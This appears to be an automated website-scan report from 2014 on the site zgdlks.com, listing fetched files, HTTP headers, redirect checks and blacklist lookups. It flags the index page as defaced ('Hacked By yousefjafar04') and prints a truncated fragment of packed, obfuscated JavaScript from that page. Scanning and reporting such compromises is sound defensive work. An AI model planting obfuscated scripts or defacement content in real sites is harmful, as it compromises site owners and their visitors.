Scanned pages/files
Request | Server response | Status |
http://www.zgdlks.com/ | HTTP/1.1 200 OK Date: Thu, 05 Jun 2014 01:18:06 GMT Accept-Ranges: bytes ETag: "2aaacf1f3680cf1:12bc" Server: Microsoft-IIS/6.0 Content-Length: 126272 Content-Location: http://www.zgdlks.com/index.html Content-Type: text/html Last-Modified: Wed, 04 Jun 2014 20:46:56 GMT X-Powered-By: ASP.NET | clean |
http://www.zgdlks.com/index.html | 200 OK Content-Length: 126272 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('i 9;$.8.7=n(b){i c={P:10,Q:2,F:10,1y:v,1h:v,19:\'1z\',C:\'1a\',K:r,G:r,D:v};k(!b)b=c;i d=$.1Z(c,b);9=$.8.7.1A();E 1B.20(n(){i a=$(1B);k(d.D){d.1C={Z:a.g(\'Z\'),11:a.g(\ Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By yousefjafar04 <html>
<head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="google-site-verification" content="BjRZz9n1DzC2UM2f-uxCWAFfAe5vA-z5hHTp9UtpISQ" /> <meta name="description" content="987654321 "><meta name="keywords" content="Hacked By yousefjafar04 "> <meta name="Generator" content="Microsoft FrontPage 6.0"><meta name="author" content="Hacked By yousefjafar04"> <meta name="copyright" content="Hacked By yousefjafar04"><meta name="revisit-after" content="3"> <meta name="Hacked By" content="yousefjafar04"><meta name="rating" content="general"> <meta name="classification" content="Internet Services"> <me ...[127240 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://onehackoranother.com/projects/jquery/jquery-grab-bag/javascripts/jquery.text-effects.js | 200 OK Content-Length: 3108 Content-Type: application/javascript | clean |
http://www.zgdlks.com/plugins/system/rokbox/rokbox.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.zgdlks.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.zgdlks.com/plugins/system/rokbox/themes/dark/rokbox-config.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zgdlks.com
Result:
GET / HTTP/1.1
Host: zgdlks.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zgdlks.com
Referer: http://www.google.com/search?q=zgdlks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zgdlks.com
Referer: http://www.google.com/search?q=zgdlks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zgdlks.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zgdlks.com/
Result: zgdlks.com is not infected or malware details are not published yet.
Result: zgdlks.com is not infected or malware details are not published yet.